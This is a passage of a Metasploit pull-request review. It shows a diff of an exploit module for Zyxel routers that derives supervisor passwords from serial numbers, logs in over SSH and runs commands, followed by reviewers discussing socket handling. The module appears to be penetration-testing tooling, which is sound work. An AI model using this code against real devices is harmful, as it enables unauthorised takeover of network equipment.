modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb

```diff
@@ -0,0 +1,305 @@
+        next unless service['Name'] == 'SSH'
+
+        hash_config['ssh_port'] = service['Port']
+        hash_config['ssh_wan_access'] = service['Mode']
+        hash_config['ssh_service_enabled'] = service['Enable']
+        break
+      end
+    end
+    return hash_config
+  end
+
+  def crack_supervisor_pwd(serial)
+    # crack supervisor password by exploiting a weak implementation of AES symmetric encrypting with static keys using the device serial number
+    # using system call for now. TODO: rewrite functions in native ruby
+    # there are two confirmed hashing functions that can  derive the supervisor password from the serial number, called SerialNumMethod2 and SerialNumMethod3
+    # both passwords will be returned in a password hash
+
+    hash_pwd = { 'method2' => nil, 'method3' => nil }
+    # SerialNumMethod2
+    result = `python ~/zyxel_exploit/zyxel-vmg8825-keygen/main.py -f zcfgBeCommonGenKeyBySerialNumMethod2 #{serial}`
+    pwd = result.partition(':')
+    hash_pwd['method2'] = pwd.last.strip
+
+    # SerialNumMethod3
+    result = `python ~/zyxel_exploit/zyxel-vmg8825-keygen/main.py -f zcfgBeCommonGenKeyBySerialNumMethod3 #{serial}`
+    pwd = result.partition(':')
+    hash_pwd['method3'] = pwd.last.strip
+
+    print_status("decrypted password SerialNumMethod3: #{hash_pwd['method3']}")
+    print_status("decrypted password SerialNumMethod2: #{hash_pwd['method2']}")
+    return hash_pwd
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Executing #{cmd}")
+    begin
+      Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+    rescue Timeout::Error
+      # print_warning('Timed out while waiting for command to return')
+      @timeout = true
+    end
+  end
+
+  def do_login(ip, user, pass, ssh_port)
+    # create SSH session and login
+    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
+    opts = ssh_client_defaults.merge({
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: ssh_port,
+      password: pass
+    })
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, 'Timed out during negotiation')
+    rescue Net::SSH::AuthenticationFailed
+      return false
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
+    return true
+  end
+
+  def check_port(port)
+    # checks network port and return true if open and false if closed.
+    (sleep datastore['WfsDelay']) until begin
+      TCPSocket.open(datastore['RHOST'], port)
```

Comment:
I think we preference using the `Rex::Socket::Tcp.create` abstraction to ensure pivoting works for users

Reply:
Could this preference be added to Rubocop or a linter?

Reply:
Mmm, port check does not work with your suggestion. Did not change.

Reply:
After the socket is created, it needs to be connected. 

Also the socket needs to be closed if it was opened.

Reply:
I have updated the module based on your suggestions. See https://github.com/rapid7/metasploit-framework/pull/17881/commits/c39751094ad8d036e45807ad8d361287911a3e63